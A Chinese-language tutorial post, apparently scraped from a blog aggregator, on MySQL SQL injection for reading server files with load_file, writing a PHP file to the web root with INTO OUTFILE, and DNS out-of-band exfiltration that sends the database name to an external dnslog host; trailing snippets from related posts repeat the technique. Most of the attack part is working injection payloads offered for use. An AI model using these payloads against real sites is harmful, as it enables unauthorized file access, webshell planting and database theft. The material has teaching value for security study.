sql注入之 讀寫檔案,帶外攻擊

2021-10-02 17:09:57 字數 1681 閱讀 8248

在my.ini加上secure_file_priv=

secure_file_priv=代表對檔案讀寫沒有限制

secure_file_priv=null代表不能進行檔案讀寫

secure_file_priv=d:/…代表只能對改路徑下檔案進行讀寫

函式:

load_file();

語句:

?id=-1 union select 1,load_file(「d:\phpkfgj\phpstudy\phptutorial\mysql\my.ini」),3-- -

"d:\phpkfgj\phpstudy\phptutorial\mysql\my.ini"處寫要讀的檔案路徑

效果:

函式:

into outfile或into dumpfile

語句:

?id=-1 union select 1,2,"<?php php info();?>" into outfile 「d:\phpkfgj\phpstudy\phptutorial\www\1.php」-- -

效果:

1.php成功寫入

語句:

?id=1 and load_file(concat("\\",(select database()),".3e9dai.dnslog.cn\1.txt"))-- -

3e9dai.dnslog.cn:可自行去dnslog**獲取乙個dns位址

效果:

可去dnslog上獲取剛剛檢視的資料庫名稱,之後即可進行資料脫庫

資料脫庫:

之後將結果進行16進製制轉字串即可

mysql帶外攻擊 mysql 帶外注入

帶外通道 有時候注入發現並沒有回顯,也不能利用時間盲注,那麼就可以利用帶外通道,也就是利用其他協議或者渠道,如http請求 dns解析 smb服務等將資料帶出。payload select load file concat select database xx.xx x 其中的load file的位...

注入攻擊之sql注入

在1998年,一位名為rfp的黑客發表了一篇題為 nt web technology vulnerabilities 的文章 注入攻擊的兩個條件 1 使用者能夠克制資料的輸入 在這裡,使用者能夠控制變數 2 原本要執行的 憑藉了使用者的輸入 一般輸入乙個 單引號就能引起執行查詢語句的語法錯誤,有些伺...

SQL注入檔案讀寫總結

sql注入漏洞除了可以對資料庫進行資料的查詢之外,還可以對的伺服器的檔案進行讀寫操作。靶場 首先在d盤根目錄下新建乙個test.txt檔案,為要讀取的目標檔案,內容為 好好學習,天天向上!語句 select load file 檔案路徑 union select 1,2,load file d 語句...